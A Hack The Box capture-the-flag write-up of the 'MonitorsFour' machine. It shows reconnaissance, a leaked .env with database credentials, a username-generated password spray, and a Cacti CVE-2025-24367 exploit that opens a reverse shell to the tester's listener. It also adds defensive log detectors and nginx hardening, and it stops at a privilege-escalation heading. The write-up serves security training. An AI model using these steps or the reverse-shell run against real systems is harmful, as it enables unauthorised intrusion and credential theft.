Introduction
This article is a write-up of my run at "MonitorsFour" on Hack The Box (see the link below).
※ Please note that, unlike earlier posts, this one does not go into details such as how to use each tool.
※ Please do not misuse this. Use these techniques only to contribute to society; otherwise you are breaking the law.
Initial reconnaissance
Right then, here I am again, the guy who just can't forgive Windows. Let's go!
Port scan
┌──(kali㉿kali)-[~/Desktop]
└─$ rustscan -a 10.129.31.247 --top
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.31.247:80
Open 10.129.31.247:5985
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-06 20:13 EST
Initiating Ping Scan at 20:13
Scanning 10.129.31.247 [4 ports]
Completed Ping Scan at 20:13, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:13
Scanning monitorsfour.htb (10.129.31.247) [2 ports]
Discovered open port 80/tcp on 10.129.31.247
Discovered open port 5985/tcp on 10.129.31.247
Completed SYN Stealth Scan at 20:13, 0.29s elapsed (2 total ports)
Nmap scan report for monitorsfour.htb (10.129.31.247)
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-12-06 20:13:30 EST for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
Doesn't look like AD. Probably just a plain Windows web server?
Web reconnaissance
Accessing port 80 redirects to monitorsfour.htb, so add the following entry to /etc/hosts.
10.129.31.247 monitorsfour.htb
Accessing it again gives the following page.

Huh, /var/www... so is this a container? Says the guy who can't forgive Windows...
Anyway, let's run whatweb.
┌──(kali㉿kali)-[~/Desktop/WhatWeb]
└─$ ./whatweb -v http://monitorsfour.htb/
WhatWeb report for http://monitorsfour.htb/
Status : 200 OK
Title : MonitorsFour - Networking Solutions
IP : 10.129.31.247
Country : RESERVED, ZZ
Summary : Bootstrap, Cookies[PHPSESSID], Email[sales@monitorsfour.htb], HTTPServer[nginx], JQuery, nginx, PHP[8.3.27], Script, X-Powered-By[PHP/8.3.27], X-UA-Compatible[IE=edge]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : PHPSESSID
[ Email ]
Extract email addresses. Find valid email address and
syntactically invalid email addresses from mailto: link
tags. We match syntactically invalid links containing
mailto: to catch anti-spam email addresses, eg. bob at
gmail.com. This uses the simplified email regular
expression from
http://www.regular-expressions.info/email.html for valid
email address matching.
String : sales@monitorsfour.htb
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : nginx (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.3.27
Google Dorks: (3)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Powered-By ]
X-Powered-By HTTP header
String : PHP/8.3.27 (from x-powered-by string)
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
[ nginx ]
Nginx (Engine-X) is a free, open-source, high-performance
HTTP server and reverse proxy, as well as an IMAP/POP3
proxy server.
Website : http://nginx.net/
HTTP Headers:
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 07 Dec 2025 01:12:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/8.3.27
Set-Cookie: PHPSESSID=bc0f19c49bcbc8e126b39bc983ef3ce2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Encoding: gzip
So it's PHP.
Subdomain enumeration
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://monitorsfour.htb/ -H "Host: FUZZ.monitorsfour.htb" -mc all -fs 138 -t 150
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.monitorsfour.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 138
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 258ms]
:: Progress: [100000/100000] :: Job [1/1] :: 592 req/sec :: Duration: [0:02:55] :: Errors: 0 ::
Oh, let's take a look.
Make sure you add cacti.monitorsfour.htb to /etc/hosts.

Try admin:admin just in case.

No luck.
It's v1.2.28; looking that up turned up a number of PoCs (links below).
They look like they can only be abused once authenticated, so credentials are needed. Separate information gathering is required.
Directory enumeration
Next, enumerate the original host, the one without the subdomain.
┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://monitorsfour.htb
projectdiscovery.io
[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://monitorsfour.htb
http://monitorsfour.htb
http://monitorsfour.htb/static/js/smoothscroll.js
http://monitorsfour.htb/static/js/custom.js
http://monitorsfour.htb/static/js/plugins.js
http://monitorsfour.htb/static/js/popper.min.js
http://monitorsfour.htb/static/js/bootstrap.min.js
http://monitorsfour.htb/static/js/owl.carousel.min.js
http://monitorsfour.htb/static/css/style.css
http://monitorsfour.htb/static/css/plugins.css
http://monitorsfour.htb/static/js/jquery-min.js
http://monitorsfour.htb/login
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/blockui.min.js
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/pace.min.js
http://monitorsfour.htb/static/admin/assets/js/core/app.js
http://monitorsfour.htb/static/admin/assets/css/minified/colors.min.css
http://monitorsfour.htb/static/admin/assets/js/core/libraries/jquery.min.js
http://monitorsfour.htb/static/admin/assets/css/minified/core.min.css
http://monitorsfour.htb/static/admin/assets/js/core/libraries/bootstrap.min.js
http://monitorsfour.htb/static/admin/assets/css/icons/icomoon/styles.css
http://monitorsfour.htb/static/admin/assets/css/minified/bootstrap.min.css
http://monitorsfour.htb/static/admin/assets/css/minified/components.min.css
http://monitorsfour.htb/
http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/'+i.iframeSrc+'
http://monitorsfour.htb/forgot-password
┌──(kali㉿kali)-[~/Desktop]
└─$ dirsearch -u http://monitorsfour.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/reports/http_monitorsfour.htb/__25-12-06_20-30-16.txt
Target: http://monitorsfour.htb/
[20:30:16] Starting:
[20:30:23] 200 - 97B - /.env
[20:30:26] 403 - 548B - /.ht_wsr.txt
[20:30:26] 403 - 548B - /.htaccess.bak1
[20:30:26] 403 - 548B - /.htaccess.orig
[20:30:26] 403 - 548B - /.htaccess.sample
[20:30:26] 403 - 548B - /.htaccess.save
[20:30:26] 403 - 548B - /.htaccess_extra
[20:30:26] 403 - 548B - /.htaccess_orig
[20:30:26] 403 - 548B - /.htaccess_sc
[20:30:26] 403 - 548B - /.htaccessBAK
[20:30:26] 403 - 548B - /.htaccessOLD
[20:30:26] 403 - 548B - /.htaccessOLD2
[20:30:26] 403 - 548B - /.htm
[20:30:26] 403 - 548B - /.html
[20:30:26] 403 - 548B - /.htpasswds
[20:30:26] 403 - 548B - /.htpasswd_test
[20:30:26] 403 - 548B - /.httr-oauth
[20:31:17] 200 - 367B - /contact
[20:31:17] 403 - 548B - /controllers/
[20:31:40] 200 - 4KB - /login
[20:32:10] 301 - 162B - /static -> http://monitorsfour.htb/static/
[20:32:17] 200 - 35B - /user
[20:32:19] 301 - 162B - /views -> http://monitorsfour.htb/views/
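Looking at this from the defender's side: the dirsearch run above produces a burst of 403/404 responses from one client within a few seconds, and the one hit that matters, a 200 for /.env, is a request for a dotfile that the server actually served. The block below is an added example (my own code, not part of this write-up or of the box) that runs both checks over constructed nginx combined-format log lines; the sample lines, the 60-second window and the threshold of 10 error responses are assumptions.

```python
"""Detect directory-enumeration bursts and served dotfiles in nginx access logs."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in nginx "combined" log format; these are not logs from the box.
SAMPLE_LOG = """\
10.10.14.8 - - [06/Dec/2025:20:30:23 -0500] "GET /.env HTTP/1.1" 200 97 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:26 -0500] "GET /.ht_wsr.txt HTTP/1.1" 403 548 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:26 -0500] "GET /.htaccess.bak1 HTTP/1.1" 403 548 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:26 -0500] "GET /.htaccess.orig HTTP/1.1" 403 548 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:27 -0500] "GET /.htaccess.sample HTTP/1.1" 403 548 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:27 -0500] "GET /.htpasswds HTTP/1.1" 403 548 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:28 -0500] "GET /admin.php HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:28 -0500] "GET /backup.zip HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:29 -0500] "GET /config.php HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:29 -0500] "GET /db.sql HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:30 -0500] "GET /test.php HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.8 - - [06/Dec/2025:20:30:30 -0500] "GET /old/ HTTP/1.1" 404 146 "-" "dirsearch/0.4.3"
10.10.14.20 - - [06/Dec/2025:20:30:40 -0500] "GET / HTTP/1.1" 200 13688 "-" "Mozilla/5.0"
10.10.14.20 - - [06/Dec/2025:20:30:41 -0500] "GET /static/css/style.css HTTP/1.1" 200 4021 "http://monitorsfour.htb/" "Mozilla/5.0"
10.10.14.20 - - [06/Dec/2025:20:30:55 -0500] "GET /favicon.ico HTTP/1.1" 404 146 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop any query string
        "status": int(m["status"]),
    }


def is_dotfile_path(path):
    """True if any path segment starts with '.', e.g. /.env or /app/.git/config."""
    return any(seg.startswith(".") for seg in path.split("/") if seg)


def find_exposed_dotfiles(entries):
    """High-fidelity finding: a dotfile request that the server actually served (2xx)."""
    return sorted({(e["ip"], e["path"]) for e in entries
                   if is_dotfile_path(e["path"]) and 200 <= e["status"] < 300})


def find_enumeration_bursts(entries, window_s=60, threshold=10):
    """Per source IP, the largest number of 403/404 responses inside any window_s span.
    Only IPs that reached the threshold are returned."""
    per_ip = defaultdict(list)
    for e in entries:
        if e["status"] in (403, 404):
            per_ip[e["ip"]].append(e["ts"])
    bursts = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        left, best = 0, 0
        for right, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while (ts - stamps[left]).total_seconds() > window_s:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            bursts[ip] = best
    return bursts


def analyze(log_text, window_s=60, threshold=10):
    """Run both detectors over raw log text and return their findings."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        "exposed_dotfiles": find_exposed_dotfiles(entries),
        "enumeration_bursts": find_enumeration_bursts(entries, window_s, threshold),
    }


if __name__ == "__main__":
    for name, finding in analyze(SAMPLE_LOG).items():
        print(name, finding)
```

The burst check is noisy on its own (a broken link farm looks similar), which is why the served-dotfile check is kept separate: one 200 for /.env from an IP that is also mid-burst is the alert worth paging on.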
There is a .env, so look at its contents.
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
Looks like DB details, but I tried these credentials on cacti anyway.
No luck!
Dig deeper. This looks like an enumeration-heavy box.
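As an added example rather than the box's real configuration (the server block, document root and PHP fallback are assumed), here is the nginx pattern that lets a dotfile such as /.env be fetched, alongside a hardened form that refuses any dotted path segment:

```nginx
# Weak: a single catch-all location serves every file under the web root,
# so a request for /.env is answered with the file's contents.
server {
    listen 80;
    server_name monitorsfour.htb;
    root /var/www/html;   # assumed document root

    location / {
        try_files $uri $uri/ /index.php?$args;
    }
}

# Hardened: regex locations are evaluated before the prefix location above,
# so any path containing a "/." segment is rejected before try_files runs.
# The negative lookahead leaves /.well-known/ (ACME challenges) reachable.
server {
    listen 80;
    server_name monitorsfour.htb;
    root /var/www/html;   # assumed document root

    location ~ /\.(?!well-known/) {
        return 404;       # 404, not 403, so a probe cannot tell "denied" from "absent"
    }

    location / {
        try_files $uri $uri/ /index.php?$args;
    }
}
```

The real fix is to keep .env outside the document root entirely (or not ship it to production at all); the location rule is defence in depth for the day it ends up there anyway. Returning 404 rather than the 403 seen for the .ht* files above means an enumerator cannot distinguish a protected file from a nonexistent one.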
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .php,.txt,.pdf -u http://monitorsfour.htb/FUZZ -t 150
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Extensions : .php .txt .pdf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 296ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 308ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 309ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 308ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 315ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 319ms]
contact [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 459ms]
controllers [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 283ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/controllers/FUZZ
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 678ms]
login [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 1596ms]
static [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 257ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/FUZZ
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 1518ms]
views [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 321ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/views/FUZZ
[INFO] Starting queued job on target: http://monitorsfour.htb/controllers/FUZZ
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 280ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 284ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 284ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
[INFO] Starting queued job on target: http://monitorsfour.htb/static/FUZZ
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 283ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 290ms]
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 286ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/admin/FUZZ
css [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 318ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/css/FUZZ
fonts [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 418ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/fonts/FUZZ
images [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 332ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/images/FUZZ
js [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 318ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/static/js/FUZZ
[INFO] Starting queued job on target: http://monitorsfour.htb/views/FUZZ
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 271ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 279ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 285ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 288ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 288ms]
admin [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 306ms]
[INFO] Adding a new job to the queue: http://monitorsfour.htb/views/admin/FUZZ
forgot_password.php [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 3836ms]
index.php [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 1021ms]
login.php [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 1972ms]
[INFO] Starting queued job on target: http://monitorsfour.htb/static/admin/FUZZ
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 295ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 299ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 300ms]
assets [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 256ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://monitorsfour.htb/static/admin/assets/
[INFO] Starting queued job on target: http://monitorsfour.htb/static/css/FUZZ
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 266ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 282ms]
There are views and controllers directories, so it looks like the layout typical of MVC web apps.
views returns responses that look like they expose the original PHP, so dig into that area.
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -recursion -recursion-depth 2 -e .php,.txt,.pdf -u http://monitorsfour.htb/views/admin/FUZZ -t 150
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/views/admin/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Extensions : .php .txt .pdf
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 286ms]
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 292ms]
.htaccess.txt [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 294ms]
.htaccess.pdf [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 314ms]
api.php [Status: 200, Size: 9229, Words: 763, Lines: 215, Duration: 1217ms]
changelog.php [Status: 200, Size: 8471, Words: 511, Lines: 197, Duration: 1827ms]
customers.php [Status: 200, Size: 9491, Words: 979, Lines: 221, Duration: 4026ms]
dashboard.php [Status: 200, Size: 28212, Words: 1169, Lines: 653, Duration: 1669ms]
footer.php [Status: 200, Size: 302, Words: 22, Lines: 20, Duration: 891ms]
invoices.php [Status: 200, Size: 19023, Words: 4839, Lines: 415, Duration: 2026ms]
navbar.php [Status: 200, Size: 7706, Words: 353, Lines: 161, Duration: 1353ms]
tasks.php [Status: 200, Size: 9317, Words: 884, Lines: 217, Duration: 909ms]
users.php [Status: 200, Size: 13987, Words: 2930, Lines: 321, Duration: 3455ms]
:: Progress: [81912/81912] :: Job [1/1] :: 109 req/sec :: Duration: [0:15:46] :: Errors: 0 ::
Found a bunch. Let's take a look.


Looks like the page shown after logging in as admin.
There is a button to create an API key, so there is an API. The login page's login flow also showed endpoints like /api/v1/auth, so enumerate that too.
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -u http://monitorsfour.htb/api/v1/FUZZ -t 150
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/api/v1/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 298ms]
.htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 297ms]
auth [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 692ms]
logout [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 374ms]
reset [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 1754ms]
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 3299ms]
users [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 2981ms]
:: Progress: [20478/20478] :: Job [1/1] :: 100 req/sec :: Duration: [0:02:43] :: Errors: 0 ::
So many... I don't get this API...
Initial access
Abuse API
Can I enumerate user information via /api/v1/users or similar?

It says the token parameter is invalid, so I filled it with random values. After a lot of fiddling, the following somehow worked.
No idea why it worked.

Filled in a random token, poked around, and somehow it went through. Why?!
There is a password hash, so let's try cracking it.
CVE-2025-24367
Password Spray
I tested whether SQLi against MariaDB was possible through this web app, but found no particularly useful route.
That said, I found the following note.

Ah, I've seen this before. It's that Windows Docker Desktop vulnerability that gives you free rein over files on the host!
Now I can see the route to privilege escalation. All that's left is logging in to cacti.
So let's try the credentials directly on cacti.
The admin account didn't work, so borrow the name "Marcus Higgins" and try that.
Generate a list of usernames with the following.
┌──(kali㉿kali)-[~/Desktop/username-anarchy]
└─$ ./username-anarchy Marcus Higgins > marcus.txt
┌──(kali㉿kali)-[~/Desktop/username-anarchy]
└─$ cat marcus.txt
marcus
marcushiggins
marcus.higgins
marcushi
marchigg
marcush
m.higgins
mhiggins
hmarcus
h.marcus
higginsm
higgins
higgins.m
higgins.marcus
mh
Spraying these casually, the very first attempt, marcus:wonderful1, hit.

Now I can try the PoC!
RCE
Listen on port 4444 and run the PoC.
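On the defensive side, a spray like this stands out because one source tries many different usernames, each only once or twice, and then succeeds. The block below is an added example (my own, not from the write-up or from Cacti) over constructed login-audit lines in an assumed key=value format; the five-minute window, the five-user spray threshold and the five-failure brute-force threshold are also assumptions. It reports, per source, how many distinct usernames failed inside the window and whether a success followed, and separately flags the classic one-user hammering.

```python
"""Distinguish password spraying from single-account brute force in login audit lines."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed login-audit lines in an assumed key=value format (not Cacti's real log).
SAMPLE_AUTH_LOG = """\
2025-12-07T01:40:01Z src=10.10.14.20 user=admin result=FAIL
2025-12-07T01:40:09Z src=10.10.14.20 user=admin result=SUCCESS
2025-12-07T01:41:00Z src=10.10.14.8 user=admin result=FAIL
2025-12-07T01:41:01Z src=10.10.14.8 user=marcushiggins result=FAIL
2025-12-07T01:41:01Z src=10.10.14.8 user=marcus.higgins result=FAIL
2025-12-07T01:41:02Z src=10.10.14.8 user=m.higgins result=FAIL
2025-12-07T01:41:02Z src=10.10.14.8 user=mhiggins result=FAIL
2025-12-07T01:41:03Z src=10.10.14.8 user=higginsm result=FAIL
2025-12-07T01:41:04Z src=10.10.14.8 user=marcus result=SUCCESS
2025-12-07T01:45:10Z src=10.10.14.30 user=admin result=FAIL
2025-12-07T01:45:11Z src=10.10.14.30 user=admin result=FAIL
2025-12-07T01:45:12Z src=10.10.14.30 user=admin result=FAIL
2025-12-07T01:45:13Z src=10.10.14.30 user=admin result=FAIL
2025-12-07T01:45:14Z src=10.10.14.30 user=admin result=FAIL
2025-12-07T01:45:15Z src=10.10.14.30 user=admin result=FAIL
"""

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$"
)


def parse_auth_line(line):
    """Return one event as a dict, or None for lines that do not match the format."""
    m = AUTH_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S%z"),
            "src": m["src"], "user": m["user"], "result": m["result"]}


def load_events(text):
    return [e for e in map(parse_auth_line, text.splitlines()) if e]


def detect_password_spray(events, window_s=300, min_users=5):
    """Flag sources that fail logins for >= min_users distinct usernames within window_s.
    Returns {src: {"distinct_users": n, "followed_by_success": bool}}."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "FAIL"]
        in_window = Counter()        # username -> failures currently inside the window
        left, best = 0, 0
        for ev in fails:
            in_window[ev["user"]] += 1
            while (ev["ts"] - fails[left]["ts"]).total_seconds() > window_s:
                old = fails[left]["user"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        if best >= min_users:
            last_fail = fails[-1]["ts"]
            success_after = any(e["result"] == "SUCCESS" and e["ts"] >= last_fail for e in evs)
            findings[src] = {"distinct_users": best, "followed_by_success": success_after}
    return findings


def detect_brute_force(events, min_failures=5):
    """Classic pattern: one source, one username, many failures. Returns {(src, user): count}."""
    fails = Counter((e["src"], e["user"]) for e in events if e["result"] == "FAIL")
    return {key: n for key, n in fails.items() if n >= min_failures}


if __name__ == "__main__":
    evs = load_events(SAMPLE_AUTH_LOG)
    print("spray:", detect_password_spray(evs))
    print("brute force:", detect_brute_force(evs))
```

Per-account lockout, the usual answer to brute force, does nothing against a spray, because each account sees only one failure; the spray detector keys on the source instead, and a success that follows a cluster of failures from that source is the signal to treat the new session as suspect.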
┌──(kali㉿kali)-[~/Desktop/CVE-2025-24367-Cacti-PoC]
└─$ python exploit.py --user marcus -p wonderful1 -i 10.10.14.8 -l 4444 -url http://cacti.monitorsfour.htb
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: ThRXY.php
[+] Got payload: /bash
[i] Created PHP filename: CCzIB.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.8] from (UNKNOWN) [10.129.104.46] 53332
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
www-data@821fbd6a43fa:~/html/cacti$
Is that a win?
Privilege escalation
CVE-2025-9074
